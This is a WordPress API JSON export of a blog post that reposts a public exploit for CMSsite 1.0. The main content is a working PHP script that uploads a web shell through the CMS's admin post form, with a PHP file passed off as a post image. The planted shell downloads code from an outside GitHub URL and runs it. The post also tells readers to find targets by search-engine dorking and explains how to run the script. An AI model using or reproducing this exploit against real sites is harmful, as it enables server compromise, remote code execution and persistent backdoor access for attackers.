{"id":59142,"date":"2024-08-23T19:59:58","date_gmt":"2024-08-23T16:59:58","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180340\/cmssite10-shell.txt"},"modified":"2024-08-23T19:59:58","modified_gmt":"2024-08-23T16:59:58","slug":"cmssite-1-0-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/cmssite-1-0-shell-upload\/","title":{"rendered":"CMSsite 1.0 Shell Upload"},"content":{"rendered":"<p>=============================================================================================================================================<br \/>| # Title : CMSsite 1.0 php code injection Vulnerability |<br \/>| # Author : indoushka |<br \/>| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) |<br \/>| # Vendor : https:\/\/github.com\/VictorAlagwu\/CMSsite\/archive\/master.zip |<br \/>=============================================================================================================================================<\/p>\n<p>poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] This payload injects php code of your choice into an SHELL.php file. <\/p>\n[+] Line 31<br \/>Line 40<\/p>\n[+] change the path of the script folder.<\/p>\n[+] save payload as poc.php<\/p>\n[+] usage from cmd : C:\\www\\test&gt;php 1.php 127.0.0.1<\/p>\n[+] payload : <\/p>\n<p>&lt;?php<\/p>\n<p>function file_upload($target_ip) {<br \/>$file_name = &#8220;indoushka.php&#8221;;<br \/>$webshell_payload = &#8220;&lt;?php<br \/>\\$url = &#8216;https:\/\/raw.githubusercontent.com\/indoushka\/txt\/main\/indoushka.txt&#8217;;<br \/>\\$ch = curl_init();<br \/>curl_setopt(\\$ch, CURLOPT_URL, \\$url);<br \/>curl_setopt(\\$ch, CURLOPT_RETURNTRANSFER, true);<br \/>\\$output = curl_exec(\\$ch);<br \/>curl_close(\\$ch);<br \/>if (\\$output) {<br \/>include &#8216;data:\/\/text\/plain;base64,&#8217; . base64_encode(\\$output);<br \/>}<br \/>?&gt;&#8221;;<\/p>\n<p>$post_fields = array(<br \/>&#8216;create_post&#8217; =&gt; &#8221;,<br \/>&#8216;post_image&#8217; =&gt; new CURLFile(&#8216;data:\/\/text\/plain;base64,&#8217; . base64_encode($webshell_payload), &#8216;application\/x-php&#8217;, $file_name),<br \/>&#8216;post_title&#8217; =&gt; &#8216;inouva&#8217;,<br \/>&#8216;post_category_id&#8217; =&gt; &#8216;123&#8217;,<br \/>&#8216;post_tags&#8217; =&gt; &#8217;99&#8217;,<br \/>&#8216;post_content&#8217; =&gt; &#8216;N0_name&#8217;,<br \/>&#8216;post_status&#8217; =&gt; &#8216;Hackers&#8217;,<br \/>&#8216;qty&#8217; =&gt; &#8216;1&#8217;<br \/>);<\/p>\n<p>echo &#8220;(+) PHP Code Injection &#8230;\\n&#8221;;<\/p>\n<p>$ch = curl_init();<br \/>curl_setopt($ch, CURLOPT_URL, &#8220;http:\/\/$target_ip\/CMSsite-master\/admin\/posts.php?source=add_post&#8221;);<br \/>curl_setopt($ch, CURLOPT_POST, 1);<br \/>curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);<br \/>curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<\/p>\n<p>$response = curl_exec($ch);<br \/>curl_close($ch);<\/p>\n<p>echo &#8220;(+) Shell uploaded successfully.\\n&#8221;;<br \/>echo &#8220;(+) Access the shell at: http:\/\/$target_ip\/CMSsite-master\/img\/$file_name\\n&#8221;;<br \/>}<\/p>\n<p>if ($argc != 2) {<br \/>echo &#8220;(+) Usage: php &#8221; . $argv[0] . &#8221; &lt;target ip&gt;\\n&#8221;;<br \/>echo &#8220;(+) Example: php &#8221; . $argv[0] . &#8221; 10.0.0.1\\n&#8221;;<br \/>exit(-1);<br \/>}<\/p>\n<p>$target_ip = $argv[1];<br \/>file_upload($target_ip);<\/p>\n[+] Path : http:\/\/127.0.0.1\/CMSsite-master\/img\/<\/p>\n<p>Greetings to :============================================================<br \/>jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br \/>==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=============================================================================================================================================| # Title : CMSsite 1.0 php code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) || # Vendor : https:\/\/github.com\/VictorAlagwu\/CMSsite\/archive\/master.zip |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] This payload injects php code of your &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59142","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59142","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59142"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59142\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59142"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59142"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59142"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}